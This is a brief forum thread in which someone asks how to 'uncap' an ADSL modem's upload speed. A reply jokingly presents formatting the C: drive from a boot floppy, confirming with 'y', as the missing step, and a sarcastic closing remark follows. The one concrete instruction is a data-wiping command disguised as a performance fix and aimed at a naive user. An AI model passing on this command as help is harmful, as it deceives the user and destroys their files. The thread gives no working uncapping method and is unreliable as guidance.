    how can i uncap my modem

    i heard about the caps etc...
    how do i uncap my upload speed?
    Amd Athlon XP 2200+, 512 DDR Ram, 9800Pro 128MB, 1500/256 ADSL

    I cant believe you guys.... Withholding the most important piece of information to uncap properly... you just have to boot from a floppy, type c:>windows/command/format c: and quickly hit the y key as soon as it pops up... very important!

    OK- now that I properly read all that other great information I see that every trick has been completly laid out so that even a complete idiot should have absolutely no problem achieving these spectacular speeds that you just know everyone else has...
